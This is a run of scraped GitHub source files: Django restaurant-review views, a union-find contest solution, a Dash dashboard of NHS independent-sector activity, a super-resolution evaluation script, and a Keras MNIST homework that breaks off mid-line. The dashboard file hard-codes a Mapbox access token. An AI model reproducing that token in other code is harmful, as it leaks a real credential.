dish_style != '全部':\n shop_list = shop_list.filter(category__contains = dish_style).order_by('-avg_rating')\n if region != '全市':\n if subregion != '全区':\n shop_list = shop_list.filter(region__contains = subregion).order_by('-avg_rating')\n else:\n shop_list = search_region(shop_list, region, dish_style)\n\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef accurate(request, id):\n my_id = str(id)\n business = None\n try:\n business = Business.objects.get(shop_id = my_id)\n except:\n messages.info(request, \"店铺未找到\")\n reviews = Review.objects.filter(business__shop_id = my_id).order_by('-created_at')\n print(len(reviews))\n starred = 0\n\n if request.user.is_authenticated():\n profile = Profile.objects.get(user = request.user)\n try:\n profile.starred_list.get(shop_id = my_id)\n starred = 1\n except:\n starred = 0\n\n return render(request, 'show.html',{'business': business, 'reviews' : reviews, 'starred': starred})\n\ndef business_review(my_business):\n reviews = Review.objects.filter(business = my_business)\n return reviews\n\ndef recommend(request):\n dish_style = request.POST.get('mydish')\n region = request.POST.get('myregion')\n shop_list = Business.objects.all()\n\n if dish_style != None:\n shop_list = 
shop_list.filter(category__contains = dish_style).order_by('-avg_rating')\n if region != None:\n shop_list = shop_list.filter(region__contains = region).order_by('-avg_rating')\n\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef region_search(request, region):\n shop_list = Business.objects.filter(region__contains = region).order_by('-avg_rating')\n return render(request, 'display.html', {'businesses':shop_list})\n\ndef dish_search(request, dish):\n shop_list = Business.objects.filter(category__contains = dish).order_by('-avg_rating')\n return render(request, 'display.html', {'businesses':shop_list})\n\n@login_required\ndef create(request, myshop_id):\n params = request.POST if request.method == 'POST' else None\n\n form = ReviewForm(params)\n if form.is_valid():\n review = form.save(commit = False)\n review.user = request.user\n review.author = request.user.username\n business = Business.objects.get(shop_id = myshop_id)\n review.business = business\n if len(review.content) >= 50:\n review.excerpt = review.content[:50]\n else:\n review.excerpt = review.content\n\n if review.grade < 0 or review.grade > 5:\n messages.info(request, '请输入0到5之间的分数')\n elif review.price < 0:\n messages.info(request, '请输入大于等于0的价格')\n else:\n review.save()\n messages.info(request, '评论《{}》创建成功'.format(review.excerpt))\n\n form = ReviewForm()\n\n return render(request, 'comment.html', {'form':form, 'shop_id':myshop_id})\n","repo_name":"effie-0/my-dianping","sub_path":"dianping/myrequest.py","file_name":"myrequest.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15200941649","text":"def init(n):\r\n global par, rank\r\n par = [i for i in range(n)]\r\n rank = [0] * n\r\n\r\ndef find(x):\r\n global par\r\n if par[x] == x:\r\n return x\r\n else:\r\n par[x] = find(par[x])\r\n return par[x]\r\n\r\ndef unite(x, y):\r\n global par, rank\r\n x = find(x)\r\n y = find(y)\r\n if x == y:\r\n return\r\n if rank[x] < rank[y]:\r\n par[x] = y\r\n else:\r\n par[y] = x\r\n if rank[x] == rank[y]:\r\n rank[x] += 1\r\n\r\ndef same(x, y):\r\n return find(x) == find(y)\r\n\r\nN, M = map(int, input().split())\r\ninit(N)\r\np = list(map(int, input().split()))\r\nfor _ in range(M):\r\n x, y = map(int, input().split())\r\n unite(x - 1, y - 1)\r\nans = 0\r\nfor i in range(N):\r\n if same(i, p[i] - 1):\r\n ans += 1\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc097/B/4820474.py","file_name":"4820474.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"32096990448","text":"#========================================= IMPORT LIBRARIES ============================================================\nimport plotly.express as px\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table as dt\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input, Output, State\nimport pandas as pd\nimport numpy as np\n#from tkinter import filedialog #REMEMBER this doesnt work with HEROKU deployment, must comment out before deploying this code\nimport base64\nimport plotly.graph_objs as go\nfrom datetime import date\nimport gunicorn\n\n#===================================== LOADING + TRANSFORMING THE DATA =================================================\n\n#Load Core data\ndf = pd.read_csv(r'ActualsPlanTidy_Data.csv', 
encoding='ISO-8859-1', low_memory=False)\n\n#Basic cleansing\ndf['Activity Count'].fillna(0, inplace=True)\ndf['Activity Count'].replace('-', 0)\n\n#print(df.shape)\ndf = df[(df['POD'] !='DNA/Cancellation (Theatres Only)') & (df['POD'] !='Number of 1/2 Day Lists (Theatres Only)') & (df['POD'] !='Chemotherapy')]\n#print(df.shape)\n\n#Load Location data\nlocation_df = pd.read_csv(r'Location_data.csv', encoding='ISO-8859-1', low_memory=False)\n\n#Join Location onto the Core df\ndf = pd.merge(df,location_df,on='Independent Provider', how='left')\nprint(df.shape)\nprint(df)\n\n#Convert Lat and Long to str for grouping\ndf['Lat'] = df['Lat'].astype(str)\ndf['Long'] = df['Long'].astype(str)\n\n\ndf_grouped = df.groupby(['Inner or Outer','Plan or Actuals','Activity Type', 'Independent Provider','STP','POD','Week Commencing Date','Lat','Long'], as_index=False)['Activity Count'].sum()\ndf_actuals = df_grouped[(df_grouped['Plan or Actuals'] =='Actuals')]\ndf_actuals.rename(columns={\"Activity Count\": \"Actual Activity\"}, inplace=True)\ndf_plan = df_grouped[(df_grouped['Plan or Actuals'] =='Plan')]\ndf_plan.rename(columns={\"Activity Count\": \"Plan Activity\"}, inplace=True)\n\nprint(df_actuals.shape)\nprint(df_plan.shape)\n\n\n#Now we need to merge the datasets so we have 2 extra fact columns - plan and capacity values, this will be much easier to plot on tables/graphs\ndf_merged = df_actuals.merge(df_plan, on=['Activity Type','Independent Provider','STP','POD','Week Commencing Date'], how='left')\ndf_merged = df_merged.drop(['Inner or Outer_y','Plan or Actuals_y','Lat_y','Long_y','Plan or Actuals_x'], axis=1)\ndf_merged.rename(columns={'Inner or Outer_x':'Inner or Outer','Lat_x':'Lat','Long_x':'Long'}, inplace=True)\n\n#Find the most recent date\ndf_merged['Week Commencing Date'] = pd.to_datetime(df_merged['Week Commencing Date'], dayfirst=True)\nmost_recent_date = df_merged['Week Commencing Date'].max()\noldest_date = df_merged['Week Commencing Date'].min()\n\n#========================================= DASH LAYOUT =================================================================\n\napp = dash.Dash(__name__, eager_loading=True, external_stylesheets=[dbc.themes.LUX])\nserver = app.server\nimage_filename = r'NHS 10mm - RGB Blue on white.png' # replace with your own image - must be png image type - use this website to convert :https://jpg2png.com/\nencoded_image = base64.b64encode(open(image_filename, 'rb').read())\napp.layout = html.Div([\n dbc.Row([dbc.Col(html.H1('Independant Sector Weekly Activity Dashboard',className='dark'),style={'text-align': 'center','vertical-align':'middle'}),\n dbc.Col(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()), width=130, height=50, style={'vertical-align':'middle'}), width=1),\n ]),\n\n html.Hr(),\n\n dbc.Row(dbc.Col(html.H5('Data can be filtered using the options below',className='dark'),style={'text-align': 'center','vertical-align':'middle'})),\n\n dbc.Row([dbc.Col(dcc.Dropdown(id='POD_Dropdown',\n options=[\n {\"label\": \"Elective\", \"value\": \"Elective\"},\n {\"label\": \"Daycase\", \"value\": \"Daycase\"},\n {\"label\": \"Diagnostics\", \"value\": \"Diagnostics\"},\n {\"label\": \"Outpatients\", \"value\": \"Outpatients\"}\n ],\n multi=True,\n value=['Elective', 'Daycase'],\n style={'text-align': 'center'},\n clearable=False,\n placeholder='Please select point of delivery'\n ), width={'size':5, 'offset':1}),\n\n dbc.Col(dcc.Dropdown(id='STP_Dropdown',\n options=[\n {\"label\": \"SWL STP\", \"value\": \"South West London STP\"},\n 
{\"label\": \"SEL STP\", \"value\": \"South East London STP\"},\n {\"label\": \"NWL STP\", \"value\": \"North West London STP\"},\n {\"label\": \"NCL STP\", \"value\": \"North London STP\"},\n {\"label\": \"NEL STP\", \"value\": \"East London STP\"}\n ],\n multi=True,\n value=['South West London STP','South East London STP',\"North West London STP\",\"North London STP\",\"East London STP\"],\n style={'text-align': 'center'},\n clearable=False,\n placeholder='Please select your STP(s)'\n ),width={'size':5, 'offset':-1})]),\n\n\n html.Br(),\n\n dbc.Row(dbc.Col(\n dcc.Checklist(id='Checklist',\n options=[\n {'label': 'Outer Providers', 'value': 'Outer'},\n {'label': 'Inner Providers', 'value':'Inner'}\n ],\n value=['Outer'],\n inputStyle={\"margin-right\": \"10px\",\"margin-left\": \"10px\"},\n #labelStyle={'display': 'inline-block'},\n ),style={'text-align': 'center','vertical-align':'middle'})),\n\n #html.Br(),\n\n dbc.Row(dbc.Col(\n dcc.Checklist(id='Checklist-eRS',\n options=[\n {'label': 'Acute', 'value': 'Normal'},\n {'label': 'eRS', 'value': 'eRS'}\n ],\n value=['Normal','eRS'],\n inputStyle={\"margin-right\": \"10px\",\"margin-left\": \"10px\"},\n # labelStyle={'display': 'inline-block'},\n ), style={'text-align': 'center', 'vertical-align': 'middle','margin-left': '15px'})),\n\n html.Br(),\n\n html.Hr(),\n\n dcc.Tabs(id=\"tabs\", value='util-tab', children=[\n\n # TAB 1 - THE TABLE\n dcc.Tab(label='Utilisation Table', value='util-tab', children=[html.Div([\n\n html.Br(),\n dbc.Row(dbc.Col(dcc.DatePickerRange(\n id='date',\n min_date_allowed=date(1995, 8, 5),\n max_date_allowed=date(2023, 9, 1),\n initial_visible_month=date(2021, 1, 1),\n start_date=date(2021,1,1),\n end_date=date(2021,3,30),\n style={'position':'relative', 'zIndex':'999'}\n ), width={'offset': 1})),\n\n html.Div(id='Table'),\n\n html.Br(),\n\n # dbc.Row([dbc.Col(),\n # dbc.Col(dbc.Card(dbc.CardBody([html.H2(id='Card Utilisation Table',style={'text-align': 'center'},className=\"card-text\"),html.H3(\"%\",className=\"card-title\",style={'text-align': 'center'})]),color=\"rgb(188, 219, 245)\",outline=True), width={'size': 5, 'offset': -1}),\n # dbc.Col()]),\n #\n # html.Br()\n\n ])]),\n\n\n # TAB 2 - THE DASHBOARD\n dcc.Tab(label='Utilisation Dashboard', value='dash-tab', children=[\n html.Div([\n html.Br(),\n\n dbc.Row([dbc.Col(dbc.Card(dbc.CardBody([html.H3(\"Weekly Utilisation (%) ==> \" + most_recent_date.strftime('%d/%m/%y'), className=\"card-title\",style={'text-align': 'center'}),html.H2(id='Card Utilisation Week',style={'text-align': 'center'},className=\"card-text\")]),color=\"rgb(188, 219, 245)\",outline=True),width={'size': 5, 'offset': 1}),\n dbc.Col(dbc.Card(dbc.CardBody([html.H3(\"Total Utilisation (%)\",className=\"card-title\",style={'text-align': 'center'}),html.H2(id='Card Utilisation Total',style={'text-align': 'center'},className=\"card-text\")]),color=\"rgb(188, 219, 245)\",outline=True), width={'size': 5, 'offset': -1})\n ]),\n\n html.Br(),\n html.Hr(),\n\n dbc.Row([dbc.Col(dcc.Graph(id='Bar', figure={}), width={'size': 5, 'offset': 1}),\n dbc.Col(dcc.Graph(id='Line', figure={}), width={'size': 5, 'offset': -1})\n ]),\n\n html.Hr(),\n\n ])]),\n\n # TAB 3 - THE MAP\n dcc.Tab(label='Map + Upload', value='map-tab',children=[\n\n html.Br(),\n\n dbc.Row([dbc.Col(dcc.Graph(id='Map_content', figure={}))]),\n\n html.Br(),\n html.Br(),\n html.Hr(),\n html.Br(),\n\n dbc.Col(dcc.Upload(id='upload-data',children=html.Div(['Drag and Drop or ',html.A('Select Files')]),multiple=True,style={'text-align': 
'center'})),\n\n html.Br(),\n html.Hr(),\n\n html.Br(),\n\n\n ])\n ])\n\n])\n\n#width={'size': 12}\n\n#=========================================== UTILISATION TABLE CALLBACK ================================================\n\n@app.callback(Output('Table', 'children'),\n #Output('Card Utilisation Table', 'children')],\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value'),\n Input(component_id='date', component_property='start_date'),\n Input(component_id='date', component_property='end_date')]\n )\ndef render_content(POD,STP,Checklist,Checklist_eRS,start_date,end_date):\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash = df_dash[(df_dash['Week Commencing Date'] >= start_date) & (df_dash['Week Commencing Date'] <= end_date)]\n df_dash_group = df_dash.groupby(['STP', 'Independent Provider'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Utilisation (%)'] = df_dash_group['Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n card = df_dash_group['Utilisation (%)'].mean()\n card = card.round(2)\n\n\n #Formatting\n df_dash_group['Actual Activity'] = df_dash_group['Actual Activity'].map('{:,.0f}'.format)#to get numbers in format correctly\n df_dash_group['Plan Activity'] = df_dash_group['Plan Activity'].map('{:,.0f}'.format) # to get numbers in format correctly\n df_dash_group['Utilisation (%)'] = df_dash_group['Utilisation (%)'].map('{:.0f}'.format) # to get numbers in format correctly\n\n return html.Div([\n\n html. 
Br(),\n\n dbc.Row(dbc.Col(dt.DataTable(data=df_dash_group.to_dict('rows'),\n columns=[{\"name\": i, \"id\": i} for i in df_dash_group.columns],\n sort_action='native',\n page_size=100,\n fixed_rows={'headers': True},\n style_table={'height': 800},\n style_cell_conditional=[\n {'if': {'column_id': 'STP'},\n 'width': '14%'}, # 40\n {'if': {'column_id': 'Independent Provider'},\n 'width': '35%'}, # 300\n {'if': {'column_id': 'Actual Activity'},\n 'width': '12%',\n 'textAlign': 'center'},\n {'if': {'column_id': 'Plan Activity'},\n 'width': '12%',\n 'textAlign': 'center',\n },# 5\n {'if': {'column_id': 'Utilisation (%)'},\n 'width': '9%',\n 'textAlign': 'center',\n },\n\n ],\n\n style_data_conditional=[{\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 0 && {Utilisation (%)} < 60',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'tomato',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 80',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'green',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} >= 60 && {Utilisation (%)} < 80',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'orange',\n 'color': 'white'\n },\n {\n 'if': {\n 'filter_query': '{Utilisation (%)} contains \"nan\"',\n 'column_id': 'Utilisation (%)'\n },\n 'backgroundColor': 'rgb(204,204,204)',\n 'color': 'grey',\n 'fontWeight':'bold'\n }\n ],\n style_header={\n 'backgroundColor': 'rgb(188, 219, 245)',\n 'fontWeight': 'bold',\n 'textAlign': 'center',\n 'color': 'black',\n 'border': '1px solid black'\n },\n style_cell={'font_family': 'Nunito Sans',\n 'border': '1px solid grey',\n 'minWidth': 95, 'maxWidth': 95, 'width': 95,\n 'whiteSpace': 'normal'\n },\n ),width={'size':10,'offset':1}))\n ])\n\n#============================================ CARD UTILISATION TOTAL CALLBACK ==========================================\n\n@app.callback(Output('Card Utilisation Total', 'children'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash_group = df_dash.groupby(['STP', 'POD'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n df_card = df_dash_group['Plan Utilisation (%)'].mean()\n df_card = df_card.round(2)\n #df_card.map('{:.0f}'.format)\n\n return df_card\n\n#============================================ CARD UTILISATION WEEKLY CALLBACK =========================================\n\n@app.callback(Output('Card Utilisation Week', 'children'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n 
df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash = df_dash[df_dash['Week Commencing Date']==most_recent_date]\n df_dash_group = df_dash.groupby(['STP', 'POD'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity']/df_dash_group['Plan Activity'])*100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, -np.inf], np.nan)\n df_card = df_dash_group['Plan Utilisation (%)'].mean()\n #df_card.map('{:.0f}'.format)\n df_card = df_card.round(2)\n\n return df_card\n\n#============================================ LINE GRAPH CALLBACK ======================================================\n\n@app.callback(Output('Line', 'figure'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n # df_dash = df_dash[df_dash['Week Commencing Date']==oldest_date]\n df_dash_group = df_dash.groupby(['Week Commencing Date'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Actual Activity\"], name='Actuals',\n line=dict(color='royalblue', width=4)))\n\n fig.add_trace(go.Scatter(x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Plan Activity\"], name='Plan',\n line=dict(color='firebrick', width=4, dash='dot')))\n\n fig.update_xaxes(showgrid=True, ticklabelmode=\"period\", dtick=\"M1\", tickformat=\"%b\\n%Y\", title='')\n\n fig.update_xaxes(\n rangeslider_visible=False,\n rangeselector=dict(\n buttons=list([\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n )\n )\n\n\n return fig\n\n#============================================ BAR GRAPH CALLBACK ======================================================\n\n@app.callback(Output('Bar', 'figure'),\n [\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')]\n )\n\ndef render_content(POD,STP,Checklist,Checklist_eRS):\n\n\n df_dash = df_merged.copy()\n df_dash = df_dash[df_dash['POD'].isin(POD)]\n df_dash = df_dash[df_dash['STP'].isin(STP)]\n df_dash = df_dash[df_dash['Inner or Outer'].isin(Checklist)]\n df_dash = df_dash[df_dash['Activity Type'].isin(Checklist_eRS)]\n df_dash_group = df_dash.groupby(['POD', 'Week Commencing Date'], as_index=False)[\n 'Actual Activity', 'Plan Activity'].sum()\n df_dash_group['Plan Utilisation (%)'] = (df_dash_group['Actual Activity'] / df_dash_group['Plan Activity']) * 100\n df_dash_group['Plan Utilisation (%)'] = df_dash_group['Plan Utilisation (%)'].replace([np.inf, 
-np.inf],np.nan)\n\n fig = px.histogram(df_dash_group, x=\"Week Commencing Date\", y=\"Plan Utilisation (%)\", histfunc=\"avg\")\n fig.update_layout(bargap=0.1)\n fig.update_xaxes(showgrid=True, ticklabelmode=\"period\", dtick=\"M1\", tickformat=\"%b\\n%Y\", title='')\n fig.add_trace(go.Scatter(mode=\"markers\", x=df_dash_group[\"Week Commencing Date\"], y=df_dash_group[\"Plan Utilisation (%)\"], name=\"weekly values\"))\n #fig.update_traces(texttemplate='%{text:.2s}', textposition='outside')\n fig.update_layout(yaxis_title=\"Plan Utilisation (%)\",)\n fig\n\n return fig\n\n\n#============================================ MAP TAB CALLBACK =========================================================\naccess_token = 'pk.eyJ1IjoiemFpbmVpc2EiLCJhIjoiY2tlZWg0MXJvMGcwZzJyb3k1OXh0Ym55aiJ9.0SJ_VBRVxyWd6SmbdUwmKQ'\n\n@app.callback(Output('Map_content', 'figure'),\n [#Input('tabs', 'value'),\n Input(component_id='POD_Dropdown', component_property='value'),\n Input(component_id='STP_Dropdown', component_property='value'),\n Input(component_id='Checklist-eRS', component_property='value')\n ])\n\n\ndef render_content(POD,STP,Checklist_eRS):\n\n dfmap = df_merged\n #dfmap = dfmap.drop(dfmap[(dfmap['Plan Or Actual'] == 'Actuals')].index)\n dfmap = dfmap[dfmap['POD'].isin(POD)]\n dfmap = dfmap[dfmap['STP'].isin(STP)]\n dfmap = dfmap[dfmap['Activity Type'].isin(Checklist_eRS)]\n #dfmap = dfmap[(dfmap['Week Index'] >= Date[0]) & (dfmap['Week Index'] <= Date[1])]\n # REMEMBER the as_index function turns the aggregate output from a Series into a Dataframe - important as some graphs/figures need Dfs\n dfmap_group = dfmap.groupby(['STP', 'Independent Provider', 'Lat', 'Long'], as_index=False)['Actual Activity'].sum()\n dfmap_group['Actual Activity for label'] = dfmap_group['Actual Activity'].map('{:,.0f}'.format)\n dfmap_group['Label'] = dfmap_group['Actual Activity for label'].astype(str) + ' activities at ' + dfmap_group['Independent Provider'] + ' within ' + dfmap_group['STP']\n\n locations = [go.Scattermapbox(\n lon=dfmap_group['Long'],\n lat=dfmap_group['Lat'],\n mode='markers',\n unselected={'marker': {'opacity': 0.5}},\n selected={'marker': {'opacity': 1, 'size': 50}},\n hoverinfo='text',\n hovertext=dfmap_group['Label'],\n marker=dict(\n size=dfmap_group['Actual Activity'] / 2.5,\n color='blue',\n sizemode='area'\n )\n )]\n\n return {\n 'data': locations,\n 'layout': go.Layout(\n uirevision='foo', # preserves state of figure/map after callback activated\n clickmode='event+select',\n margin=dict(l=0, r=0, t=0, b=0),\n hovermode='closest',\n hoverdistance=2,\n # title=dict(text=\"COVID CASES MAPPED\", font = dict(size=35)), #irrelevant with the margins given\n mapbox=dict(\n accesstoken=access_token,\n bearing=25,\n # style='dark', # Can enter to style the graph\n center=dict(\n lat=51.505958,\n # 51.50853, # is technically the centre of London, but the other co-ordinates fit better\n lon=-0.126770\n # -0.12574 # is technically the centre of London, but the other co-ordinates fit better\n ),\n pitch=20,\n zoom=9.5\n ),\n )\n }\n\n\n\n#=======================================================================================================================\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"Zain-E/Independant-Provider-Dashboard-V2.1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44355387695","text":"import argparse, os, 
glob\r\nimport torch\r\nimport torchvision.transforms as transforms\r\nimport torchvision.utils as utils\r\nimport numpy as np\r\nimport time, math\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nfrom dataset import unnormalize, MEAN, STD\r\nfrom tqdm import tqdm\r\n\r\nparser = argparse.ArgumentParser(description=\"PyTorch SRResNet Demo\")\r\nparser.add_argument(\"--cuda\", action=\"store_true\", help=\"use cuda?\")\r\nparser.add_argument(\"--name\", type=str, help=\"training run name\")\r\nparser.add_argument(\"--gt\", default=\"testsets/gt\", type=str)\r\nparser.add_argument(\"--lr\", default=\"testsets/lr\", type=str)\r\nparser.add_argument(\"--mask\", default=\"testsets/masks\", type=str)\r\n# parser.add_argument(\"--scale\", default=2, type=int, help=\"scale factor, Default: 2\")\r\nparser.add_argument(\"--epoch\", default=500, type=int, help=\"training epoch\")\r\nparser.add_argument(\"--gpus\", default=\"0\", type=str, help=\"gpu ids (default: 0)\")\r\nparser.add_argument(\"--dest\", default=\"inference_on_train\", type=str)\r\n\r\ndef PSNR(pred, gt):\r\n diff = pred - gt\r\n rmse = math.sqrt(np.mean(diff ** 2))\r\n if rmse == 0:\r\n return 100\r\n return 20 * math.log10(255.0 / rmse)\r\n\r\nopt = parser.parse_args()\r\ncuda = opt.cuda\r\n\r\nmodel = torch.load(os.path.join(\"checkpoints\", opt.name, \"model_epoch_{0}.pth\").format(opt.epoch), map_location='cpu')[\"model\"]\r\nimg_tf = transforms.Compose([transforms.ToTensor(), transforms.Normalize(MEAN, STD)])\r\nmask_tf = transforms.ToTensor()\r\n\r\nif cuda:\r\n print(\"=> use gpu id: '{}'\".format(opt.gpus))\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = opt.gpus\r\n if not torch.cuda.is_available():\r\n raise Exception(\"No GPU found or Wrong gpu id, please run without --cuda\")\r\n model = model.cuda()\r\n\r\nimgs = glob.glob(os.path.join(opt.lr, \"*.png\"))\r\noutput_dir = os.path.join(opt.dest, opt.name, str(opt.epoch))\r\nif not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\navg_psnr_bicubic = 0.0\r\navg_psnr_sr = 0.0\r\nskipped = 0\r\n\r\nfor i in tqdm(range(len(imgs))):\r\n img_name = imgs[i].split('/')[-1]\r\n\r\n im_gt = Image.open(os.path.join(opt.gt, img_name)).convert('RGB')\r\n mask = np.array(Image.open(os.path.join(opt.mask, img_name)))\r\n im_lr = Image.open(imgs[i]).convert('RGB')\r\n im_b = np.array(im_lr.resize(im_gt.size, resample=Image.BICUBIC)).astype(float)\r\n im_gt = np.array(im_gt).astype(float)\r\n\r\n mask = mask != 0\r\n mask = np.transpose(np.tile(mask, (3,1,1)), (1,2,0))\r\n if np.sum(mask) == 0:\r\n skipped += 1\r\n continue\r\n\r\n im_b = im_b[mask]\r\n im_gt = im_gt[mask]\r\n avg_psnr_bicubic += PSNR(im_b, im_gt)\r\n\r\n im_lr = img_tf(im_lr).unsqueeze_(0)\r\n if cuda:\r\n im_lr = im_lr.cuda()\r\n\r\n model.eval()\r\n out = unnormalize(model(im_lr)).cpu()\r\n utils.save_image(out, os.path.join(output_dir, img_name))\r\n\r\n out_np = out.data[0].numpy().transpose(1,2,0).astype(float) * 255.0\r\n out_np = out_np[mask]\r\n avg_psnr_sr += PSNR(out_np, im_gt)\r\n\r\nwith open(os.path.join(output_dir, \"PSNR.txt\"), 'a+') as file:\r\n n = len(imgs) - skipped\r\n file.write(\"PSNR Bicubic: {0}\\nPSNR SRResNet: {1}\".format(avg_psnr_bicubic / n, avg_psnr_sr / n))\r\n","repo_name":"bobqywei/SRResNet","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37196119385","text":"import numpy as 
np\nfrom tensorflow import keras\nfrom tensorflow.keras import Input, layers, Model\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, Dense\nimport hw2_utils\nfrom hw2_utils import Splits\n\n# Load data and reshape to 28x28x1 (1 channel). Training, validation, test data\n# is then splits.train, splits.valid, splits.test . Within a split, inputs are\n# split.X and outputs are split.Y.\nsplits = Splits(*[\n split._replace(\n X=np.reshape(split.X, (split.X.shape[0], 28, 28, 1))\n )\n for split in hw2_utils.load_mnist()])\n\n\ndef build_model_mnist1():\n \"\"\"\n Create model as described in exercise. Return the tensorflow.keras.model\n object.\n \"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n input = Input(shape=(28, 28, 1))\n\n model = None\n\n # >>> Start of your code <<<\n '''Implementation of model described in section 5.1'''\n conv_1 = Conv2D(32, (5, 5), 1, activation= 'relu')(input)\n maxpool_1 = MaxPooling2D(pool_size=(2, 2), strides=2)(conv_1)\n dropout_1 = Dropout(rate=0.2)(maxpool_1)\n flatten = Flatten()(dropout_1)\n dense = Dense(128, activation='relu')(flatten)\n output = Dense(10,activation='softmax')(dense)\n model = Model(inputs=input, outputs=output)\n # >>> End of your code <<<\n return model\n\n\ndef train_model_mnist1(model, X, Y):\n \"\"\" Train the given model over the given instances. \"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n\n\n # >>> Start of your code <<<\n\n # Please use verbosity=2 for model.fit when generating evaluation log for\n # submission. DO NOT artificially inflate the training time for your first\n # model in order to pass the final test case.\n model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\n model.fit(X, keras.utils.to_categorical(Y), batch_size=64, verbose=2, epochs=3, validation_split=0.2)\n # >>> End of your code <<<\n\n return model\n\n\ndef build_model_mnist2():\n \"\"\"Create model as described in exercise. Return the tensorflow.keras.model\n object.\"\"\"\n\n hw2_utils.exercise(\n andrew_username=\"agrizzaf\", # <<< set your andrew username here\n seed=42\n )\n\n input = Input(shape=(28, 28, 1))\n\n model = None\n\n # >>> Start of your code <<<\n '''My implementation of a model that achieves better accuracy and converges faster than the model required above.'''\n conv_1 = 